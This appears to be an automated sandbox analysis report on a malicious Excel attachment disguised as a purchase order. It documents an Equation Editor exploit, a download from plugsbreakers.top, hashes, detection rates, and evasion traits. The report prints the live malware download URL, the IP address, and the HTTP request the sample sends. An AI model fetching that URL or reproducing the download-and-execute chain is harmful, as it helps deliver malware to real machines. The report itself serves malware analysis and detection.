Windows Analysis Report
PO906-645S790768.xlam.xlsx

ID:	1524794
Product:	CloudBasic
Start time:	10:02:21
Start date:	03.10.2024
Sample:	PO906-645S790768.xlam.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	29a10a50eb01fe79324c9cd3dc663941
SHA1:	a36ccbd34c01fed16e27a53751accab681941c5a
SHA256:	ef561a4cdb2a47c93a4b84a825c5ef76cbaf89ae3e1d7bef8034c33e0b8a1c03
Filetype:	Excel Microsoft Office Open XML Format document (35004/1) 81.40%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\Desktop\~$PO906-645S790768.xlam.xls	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\user\Desktop\~$PO906-645S790768.xlam.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185

AV Detection

Source: PO906-645S790768.xlam.xlsx

Avira: detected

Source: http://plugsbreakers.top/voicxe/mynnft.exe

Virustotal: Detection: 7%

Perma Link

Source: PO906-645S790768.xlam.xlsx	ReversingLabs: Detection: 66%
Source: PO906-645S790768.xlam.xlsx	Virustotal: Detection: 47%			Perma Link

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 66.63.187.171 Port: 80

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_035904F5 WinExec,ExitProcess,		1_2_035904F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03590429 LoadLibraryW,URLDownloadToFileW,		1_2_03590429
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_035904AA URLDownloadToFileW,		1_2_035904AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03590515 ExitProcess,		1_2_03590515
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03590397 URLDownloadToFileW,		1_2_03590397
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03590443 URLDownloadToFileW,		1_2_03590443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_0359037E ExitProcess,		1_2_0359037E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_035903B3 URLDownloadToFileW,		1_2_035903B3

Source: global traffic

DNS query: name: plugsbreakers.top

Source: global traffic

TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global traffic	TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global traffic	TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global traffic	TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global traffic	TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163

Networking

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: global traffic

HTTP traffic detected: GET /voicxe/mynnft.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: plugsbreakers.topConnection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 1_2_03590429 LoadLibraryW,URLDownloadToFileW,

1_2_03590429

Source: global traffic

HTTP traffic detected: GET /voicxe/mynnft.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: plugsbreakers.topConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: plugsbreakers.top

Source: EQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exeQHU
Source: EQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exeiEHT2T
Source: EQNEDT32.EXE, 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exej

System Summary

Source: sheet1.xml, type: SAMPLE

Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Memory allocated: 770B0000 page execute and read and write

Jump to behavior

Source: PO906-645S790768.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: sheet1.xml, type: SAMPLE

Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing

Source: classification engine

Classification label: mal96.expl.winXLSX@2/2@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PO906-645S790768.xlam.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR82F4.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: PO906-645S790768.xlam.xlsx	ReversingLabs: Detection: 66%
Source: PO906-645S790768.xlam.xlsx	Virustotal: Detection: 47%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: PO906-645S790768.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Hooking and other Techniques for Hiding and Protection

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3376

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 1_2_0359051C mov edx, dword ptr fs:[00000030h]

1_2_0359051C

Language, Device and Operating System Detection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior